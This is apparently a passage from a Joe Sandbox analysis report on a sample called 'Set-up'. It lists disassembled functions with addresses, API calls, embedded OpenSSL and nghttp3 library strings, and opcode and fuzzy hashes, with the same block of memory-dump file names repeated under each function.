nghttp3_qpack.c, xrefs: 005BE4E4

Memory Dump Source

Source File: 00000000.00000002.1855271146.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true

Associated: 00000000.00000002.1855253681.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855601017.00000000009C3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855601017.0000000000AE6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855663213.0000000000AE7000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855682277.0000000000AEA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855702572.0000000000AEB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855719884.0000000000AEF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855735888.0000000000AF2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855838625.0000000000C49000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855838625.0000000000C4D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855869175.0000000000C4E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855887304.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_510000_Set-up.jbxd

Similarity

API ID: _assert
String ID: (size_t)(p - buf->last) == len$nghttp3_qpack.c
API String ID: 1222420520-1997541155
Opcode ID: 410063ed4a21ce7b8318a86ae1a5326d456763db03c7ab9266ba6d94607580f1
Instruction ID: 28fb60613c90600388cb5559a5e9217c116dc2a78b13ee9c031df1da09fbe9f8
Opcode Fuzzy Hash: 410063ed4a21ce7b8318a86ae1a5326d456763db03c7ab9266ba6d94607580f1
Instruction Fuzzy Hash: B8E1E636B042105BD7199E2CC8817A9BBD7BBD5310F2D8A3CE599C73D2D635EC498781

Function 0077E5D0 Relevance: 5.1, APIs: 3, Instructions: 1393COMMON

Download Yara Rule

APIs

memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,00000000,00000400), ref: 0077E5F2
memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,?,00000400), ref: 0077E67F
memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,?,00000400), ref: 0078003E

Memory Dump Source

Source File: 00000000.00000002.1855271146.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true

Associated: 00000000.00000002.1855253681.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855601017.00000000009C3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855601017.0000000000AE6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855663213.0000000000AE7000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855682277.0000000000AEA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855702572.0000000000AEB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855719884.0000000000AEF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855735888.0000000000AF2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855838625.0000000000C49000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855838625.0000000000C4D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855869175.0000000000C4E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855887304.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_510000_Set-up.jbxd

Similarity

API ID: memcpy
String ID:
API String ID: 3510742995-0
Opcode ID: ce7ec1f2f7fb3d3acd66306ae896682ebbc6e261da65e7adf02f9e3cb134e561
Instruction ID: 3236bfd694ba92cd4d5ee6b7088897e9f08b24ab4762bfb06fcde1e27661f114
Opcode Fuzzy Hash: ce7ec1f2f7fb3d3acd66306ae896682ebbc6e261da65e7adf02f9e3cb134e561
Instruction Fuzzy Hash: 1CD23DAAC39BD541E723A63D68132E6E7506FFB248F51E72BFCD430E52AB217184421D

Function 0088E940 Relevance: 4.9, Strings: 3, Instructions: 1163COMMON

Download Yara Rule

Strings

`, xrefs: 0088FE82
4, xrefs: 0088EA6D
`, xrefs: 0088F8D3

Memory Dump Source

Source File: 00000000.00000002.1855271146.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true

Associated: 00000000.00000002.1855253681.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855601017.00000000009C3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855601017.0000000000AE6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855663213.0000000000AE7000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855682277.0000000000AEA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855702572.0000000000AEB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855719884.0000000000AEF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855735888.0000000000AF2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855838625.0000000000C49000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855838625.0000000000C4D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855869175.0000000000C4E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855887304.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_510000_Set-up.jbxd

Similarity

API ID:
String ID: 4$`$`
API String ID: 0-1230936812
Opcode ID: 584f368a86dbcc5af3ec16d5e9f719c7db032f64cabf71b9093de76f8398434d
Instruction ID: 9cac0cbaaf966cdc24dd338bc0b49f163601e31d2743690ae9a602067ff5f368
Opcode Fuzzy Hash: 584f368a86dbcc5af3ec16d5e9f719c7db032f64cabf71b9093de76f8398434d
Instruction Fuzzy Hash: 43B2C072D087958FD724DF18C8806AAB7E1FFDA304F158B2EE99597352D730A905CB82

Function 008648A0 Relevance: 4.8, APIs: 3, Instructions: 1070COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1855271146.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true

Associated: 00000000.00000002.1855253681.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855601017.00000000009C3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855601017.0000000000AE6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855663213.0000000000AE7000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855682277.0000000000AEA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855702572.0000000000AEB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855719884.0000000000AEF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855735888.0000000000AF2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855838625.0000000000C49000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855838625.0000000000C4D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855869175.0000000000C4E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855887304.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_510000_Set-up.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: da40db7e6db55fcd0d112687bb59f92d9cbffaf0df182664d049c9956c8b3674
Instruction ID: 87df328cd77c5cd0e0e10bceef4a89d47cd02684b986a494bf352d2c2f81fb32
Opcode Fuzzy Hash: da40db7e6db55fcd0d112687bb59f92d9cbffaf0df182664d049c9956c8b3674
Instruction Fuzzy Hash: 80A2AE71A08B16DFC718CF29C490669F7E1FF89324F16866DE8A987781D734E861CB81

Function 008862D0 Relevance: 4.4, Strings: 3, Instructions: 694COMMON

Download Yara Rule

Strings

, xrefs: 008869F8
, xrefs: 0088692B
, xrefs: 00886AA6

Memory Dump Source

Source File: 00000000.00000002.1855271146.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true

Associated: 00000000.00000002.1855253681.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855601017.00000000009C3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855601017.0000000000AE6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855663213.0000000000AE7000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855682277.0000000000AEA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855702572.0000000000AEB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855719884.0000000000AEF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855735888.0000000000AF2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855838625.0000000000C49000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855838625.0000000000C4D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855869175.0000000000C4E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855887304.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_510000_Set-up.jbxd

Similarity

API ID:
String ID: $ $
API String ID: 0-3665324030
Opcode ID: 44926a9952185c717709522a6c7a105de9636f1a377ff329ad924952f8b001f7
Instruction ID: 6297bd8d74fd87c72cd6517b8f55a7ba09931c9cf75f5557603f46aab738e4b4
Opcode Fuzzy Hash: 44926a9952185c717709522a6c7a105de9636f1a377ff329ad924952f8b001f7
Instruction Fuzzy Hash: 5F62EE75A083958FC324DF29C48066AFBE1FFC8314F148A2EE9D993351E734A955CB92

Function 006324A0 Relevance: 4.1, Strings: 3, Instructions: 385COMMON

Download Yara Rule

Strings

ossl_qrl_enc_level_set_provide_secret, xrefs: 0063251A, 0063259E, 00632748, 006327E1
ssl/quic/quic_record_shared.c, xrefs: 00632524, 006325A8, 00632752, 006327EB
quic hpquic kuossl_qrl_enc_level_set_key_update, xrefs: 00632680

Memory Dump Source

Source File: 00000000.00000002.1855271146.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true

Associated: 00000000.00000002.1855253681.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855601017.00000000009C3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855601017.0000000000AE6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855663213.0000000000AE7000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855682277.0000000000AEA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855702572.0000000000AEB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855719884.0000000000AEF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855735888.0000000000AF2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855838625.0000000000C49000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855838625.0000000000C4D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855869175.0000000000C4E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855887304.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_510000_Set-up.jbxd

Similarity

API ID:
String ID: ossl_qrl_enc_level_set_provide_secret$quic hpquic kuossl_qrl_enc_level_set_key_update$ssl/quic/quic_record_shared.c
API String ID: 0-2745174052
Opcode ID: 907da8c67dbb54749420604c40a95f12dcff6298cb64b8a88646a80a06254d55
Instruction ID: f71e5de980fc28e42afd7c48fe9684d54fcda5db226381a1b7b4a35f18ff3012
Opcode Fuzzy Hash: 907da8c67dbb54749420604c40a95f12dcff6298cb64b8a88646a80a06254d55
Instruction Fuzzy Hash: 30D1F5716083469BE7309F51DC52FABB7E7AF84704F04082CFA8957382E671E914DBA6

Function 00880560 Relevance: 3.4, APIs: 2, Instructions: 932COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1855271146.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true

Associated: 00000000.00000002.1855253681.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855601017.00000000009C3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855601017.0000000000AE6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855663213.0000000000AE7000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855682277.0000000000AEA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855702572.0000000000AEB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855719884.0000000000AEF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855735888.0000000000AF2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855838625.0000000000C49000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855838625.0000000000C4D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855869175.0000000000C4E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855887304.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_510000_Set-up.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5eda49f86767346dce642dd589e1dddd2f840c7498b2d7e6a7a9bdfb4b440d6f
Instruction ID: 924c2bce9dd6ff0b8e03e53ffd05bb0e906e94886c9e269f26befe431cd0ed2a
Opcode Fuzzy Hash: 5eda49f86767346dce642dd589e1dddd2f840c7498b2d7e6a7a9bdfb4b440d6f
Instruction Fuzzy Hash: F2829D72A087558FC724DF28C88426AF7E2FBC8714F158A2DE999D7351D770A849CF82

Function 0077E138 Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 145COMMON

Download Yara Rule

APIs

memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,?,00000400), ref: 0077E16E

Strings

providers/implementations/kdfs/argon2.c, xrefs: 0077E315, 0077E328

Memory Dump Source

Source File: 00000000.00000002.1855271146.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true

Associated: 00000000.00000002.1855253681.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855601017.00000000009C3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855601017.0000000000AE6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855663213.0000000000AE7000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855682277.0000000000AEA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855702572.0000000000AEB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855719884.0000000000AEF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855735888.0000000000AF2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855838625.0000000000C49000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855838625.0000000000C4D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855869175.0000000000C4E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855887304.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_510000_Set-up.jbxd

Similarity

API ID: memcpy
String ID: providers/implementations/kdfs/argon2.c
API String ID: 3510742995-3406374482
Opcode ID: acdf2bf2d14c00e7212f35e165b540710e976da70d15787bbc492a5cf27da7a2
Instruction ID: d219b43c718ba77c22709c40952121acba024a459fce2d63ea584f00a34016ec
Opcode Fuzzy Hash: acdf2bf2d14c00e7212f35e165b540710e976da70d15787bbc492a5cf27da7a2
Instruction Fuzzy Hash: F7513871D087009BC310EB28D84169AF7E8FF98354F55CA2DE989A3242E331FA85CB85

Function 00526080 Relevance: 3.0, APIs: 2, Instructions: 22COMMON

Download Yara Rule

APIs

memset.API-MS-WIN-CRT-STRING-L1-1-0(?,00000000,?), ref: 0052608E
BCryptGenRandom.BCRYPT(00000000,?,?,00000002), ref: 0052609C

Memory Dump Source

Source File: 00000000.00000002.1855271146.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true

Associated: 00000000.00000002.1855253681.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855601017.00000000009C3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855601017.0000000000AE6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855663213.0000000000AE7000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855682277.0000000000AEA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855702572.0000000000AEB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855719884.0000000000AEF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855735888.0000000000AF2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855838625.0000000000C49000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855838625.0000000000C4D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855869175.0000000000C4E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855887304.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_510000_Set-up.jbxd

Similarity

API ID: CryptRandommemset
String ID:
API String ID: 642379960-0
Opcode ID: ed3a7cbaad8e65eee748a71967fda291a8ccc576b531fdca0ca96a0362d7ea6c
Instruction ID: 458a3481382e13380d3057450f4b84ede90e5bfa8f6db528e0512a8c75361790
Opcode Fuzzy Hash: ed3a7cbaad8e65eee748a71967fda291a8ccc576b531fdca0ca96a0362d7ea6c
Instruction Fuzzy Hash: 04D05E3230935137DA24612D6C17F5F5A9CEFC7B20F0C402EB504E2282D560A80182A6

Function 00890940 Relevance: 2.8, Strings: 1, Instructions: 1582COMMON

Download Yara Rule

Strings

, xrefs: 008911EA

Memory Dump Source

Source File: 00000000.00000002.1855271146.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true

Associated: 00000000.00000002.1855253681.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855601017.00000000009C3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855601017.0000000000AE6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855663213.0000000000AE7000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855682277.0000000000AEA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855702572.0000000000AEB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855719884.0000000000AEF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855735888.0000000000AF2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855838625.0000000000C49000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855838625.0000000000C4D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855869175.0000000000C4E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855887304.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_510000_Set-up.jbxd

Similarity

API ID:
String ID:
API String ID: 0-3916222277
Opcode ID: 300c07fb6fc8e82579adbc0999223b65324722cb4911c0f5f51449b7cd02f531
Instruction ID: 64f1ba411b23b1b556fb2066d1969352ec15a6bd167a61a67005bfb6cc7ca8ae
Opcode Fuzzy Hash: 300c07fb6fc8e82579adbc0999223b65324722cb4911c0f5f51449b7cd02f531
Instruction Fuzzy Hash: 65E23531A0C3668BCB14DF69D09412EFBE2FBC8314F198A2DE99697350D670ED45CB86

Function 00864410 Relevance: 2.8, APIs: 2, Instructions: 316COMMON

Download Yara Rule

APIs

memset.API-MS-WIN-CRT-STRING-L1-1-0(00000000,00000000,?,?,?,?,?,?,00000000,?,?,008622FC,?,?), ref: 0086447B
memset.API-MS-WIN-CRT-STRING-L1-1-0(?,00000000,00000001), ref: 00864760

Memory Dump Source

Source File: 00000000.00000002.1855271146.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true

Associated: 00000000.00000002.1855253681.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855601017.00000000009C3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855601017.0000000000AE6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855663213.0000000000AE7000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855682277.0000000000AEA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855702572.0000000000AEB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855719884.0000000000AEF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855735888.0000000000AF2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855838625.0000000000C49000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855838625.0000000000C4D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855869175.0000000000C4E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855887304.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_510000_Set-up.jbxd

Similarity

API ID: memset
String ID:
API String ID: 2221118986-0
Opcode ID: b5dcf494e3307ecc86f7bbf26163a7b867721a4a9001fa6fb7e18d935f097b88
Instruction ID: c2dde4256e0d3b8c5703a62289f36b7b7a176679dbfc8ccf85832c7a157c6161
Opcode Fuzzy Hash: b5dcf494e3307ecc86f7bbf26163a7b867721a4a9001fa6fb7e18d935f097b88
Instruction Fuzzy Hash: 31C1AA75604B058FD724CF29C480A2AB7E2FF86314F258A2DE5AAC7791EB30F845CB51

Function 005DE3E0 Relevance: 1.8, Strings: 1, Instructions: 550COMMON

Download Yara Rule

Strings

\, xrefs: 005DE5BC

Memory Dump Source

Source File: 00000000.00000002.1855271146.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true

Associated: 00000000.00000002.1855253681.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855601017.00000000009C3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855601017.0000000000AE6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855663213.0000000000AE7000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855682277.0000000000AEA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855702572.0000000000AEB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855719884.0000000000AEF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855735888.0000000000AF2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855838625.0000000000C49000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855838625.0000000000C4D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855869175.0000000000C4E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855887304.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_510000_Set-up.jbxd

Similarity

API ID:
String ID: \
API String ID: 0-2967466578
Opcode ID: 8f9d10eabf88623e5f0c7efe1815321f50ead76f92e08de799eff4fc95675c17
Instruction ID: 8b28e4a6f3a44fc376238a4b6f0d118b04896490409ea2fdd065a2fbba178747
Opcode Fuzzy Hash: 8f9d10eabf88623e5f0c7efe1815321f50ead76f92e08de799eff4fc95675c17
Instruction Fuzzy Hash: A002C8659043066BE770BA28AC47B2B7F98BB90744F44483BFC899A343F625DD09D763

Function 007D26E0 Relevance: 1.6, Strings: 1, Instructions: 354COMMON

Download Yara Rule

Strings

B|, xrefs: 007D26E0

Memory Dump Source

Source File: 00000000.00000002.1855271146.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true

Associated: 00000000.00000002.1855253681.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855601017.00000000009C3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855601017.0000000000AE6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855663213.0000000000AE7000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855682277.0000000000AEA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855702572.0000000000AEB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855719884.0000000000AEF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855735888.0000000000AF2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855838625.0000000000C49000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855838625.0000000000C4D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855869175.0000000000C4E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855887304.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_510000_Set-up.jbxd

Similarity

API ID:
String ID: B|
API String ID: 0-2899835285
Opcode ID: 1d1dd578c30d368cbd9494781c82edd6023be7e5c4255cb51b91e5767b8b9875
Instruction ID: 468cffa49da6980fae9a84dc434861dc87842deb89215de9f395d4ccb1b5394d
Opcode Fuzzy Hash: 1d1dd578c30d368cbd9494781c82edd6023be7e5c4255cb51b91e5767b8b9875
Instruction Fuzzy Hash: 71D167F3E2054457DB0CDE38CC213A82692EB94375F5E8338FB769A3D6E238D9548684

Function 006FA780 Relevance: 1.6, APIs: 1, Instructions: 345COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1855271146.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true

Associated: 00000000.00000002.1855253681.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855601017.00000000009C3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855601017.0000000000AE6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855663213.0000000000AE7000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855682277.0000000000AEA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855702572.0000000000AEB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855719884.0000000000AEF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855735888.0000000000AF2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855838625.0000000000C49000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855838625.0000000000C4D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855869175.0000000000C4E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855887304.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

